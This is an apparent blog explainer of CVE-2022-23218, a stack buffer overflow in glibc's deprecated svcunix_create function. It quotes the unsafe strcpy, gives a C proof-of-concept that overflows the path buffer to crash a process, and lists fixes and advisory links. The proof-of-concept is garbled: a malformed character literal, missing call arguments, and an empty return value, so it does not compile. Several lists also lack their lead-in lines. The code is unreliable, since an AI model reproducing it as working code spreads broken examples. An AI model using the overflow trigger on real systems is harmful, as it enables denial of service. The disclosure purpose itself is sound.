In early 2022, security researchers discovered a critical vulnerability in the GNU C Library (glibc), a core component used by nearly all Linux distributions and many Unix systems. Given its widespread use, vulnerabilities in glibc can have significant impacts across the open-source ecosystem. Here, we'll explore CVE-2022-23218—a buffer overflow flaw inside the deprecated svcunix_create function in glibc's sunrpc (Sun Remote Procedure Call) module. We'll walk through the core issue, check out some code snippets, reference the original reports, and discuss potential ways this vulnerability could be exploited.

What is CVE-2022-23218?

CVE-2022-23218 is a security issue found in glibc versions up to 2.34. The deprecated svcunix_create function within the sunrpc module copies its path argument to the stack _without verifying its length_. This unsafe practice opens the door to stack buffer overflows.

Denial of Service (DoS): The application may crash.

- Arbitrary Code Execution: If stack protection isn't enabled, attackers can potentially execute any code they want, leading to full system compromise.

Vulnerable Code in svc_unix.c

SVCXPRT *
svcunix_create(int sock, u_int sendsize, u_int recvsize, char *path)
{
    struct sockaddr_un sun;
    ...
    // BAD: Copies the path into sun.sun_path without checking length.
    strcpy(sun.sun_path, path);
    ...
}

Notice how strcpy() is used directly? This copies the data from the provided path pointer into the sun.sun_path field without checking if it fits. If a caller supplies a path longer than what sun.sun_path can hold (typically 108 bytes on Linux), stack memory will be overwritten.

Overwrite critical data like return addresses, function pointers, or local variables on the stack.

- In programs compiled without stack protection (-fstack-protector), attackers can gain control flow and run arbitrary code.

Even though svcunix_create is deprecated, some legacy code or poorly maintained third-party projects might still invoke it, exposing systems to the flaw.

Example Exploit (Proof of Concept)

Here’s a simple proof-of-concept demonstrating how supplying an oversized path value can cause a crash:

#include <stdio.h>
#include <rpc/rpc.h>
#include <string.h>

int main() {
    char path[200];
    memset(path, 'A', sizeof(path) - 1);
    path[sizeof(path) - 1] = '\'; // Null-terminate

    // This call will overflow sun.sun_path and likely crash the process
    SVCXPRT *result = svcunix_create(-1, , , path);

    if (!result) {
        printf("svcunix_create failed (likely buffer overflow)\n");
    } else {
        printf("svcunix_create succeeded - system might be vulnerable!\n");
    }

    return ;
}

Warning: Running this on a system with vulnerable glibc could lead to a crash (or worse). Use caution and test only in a safe environment.

Mitigation and Fixes

The glibc maintainers fixed this vulnerability in version 2.35. They replaced unsafe string copies with bounded functions that ensure nothing overflows the stack.

Never pass untrusted input to svcunix_create.

- Compile with stack protection (-fstack-protector-strong) and make sure your toolchain enables all modern mitigations.

Official glibc patch:

https://sourceware.org/git/?p=glibc.git;a=commit;h=e9e6bcd7d31f

CVE entry:

https://nvd.nist.gov/vuln/detail/CVE-2022-23218

Linux distributions advisories:

- Red Hat Security Advisory
 - Debian Security Tracker

Final Thoughts

CVE-2022-23218 is an example of how old, deprecated code—even when rarely used—can pose a real threat if not carefully managed or removed. The core lesson: always validate input and use safe string operations. Upgrading to recent versions of glibc and auditing legacy codebases are crucial steps in keeping your systems secure.

If your applications are still relying on RPC code, especially deprecated APIs, now's the time to review and modernize. Stay safe and keep your stacks—literal and figurative—protected from overflow!

Timeline

Published on: 01/14/2022 07:15:00 UTC
Last modified on: 08/19/2022 10:01:00 UTC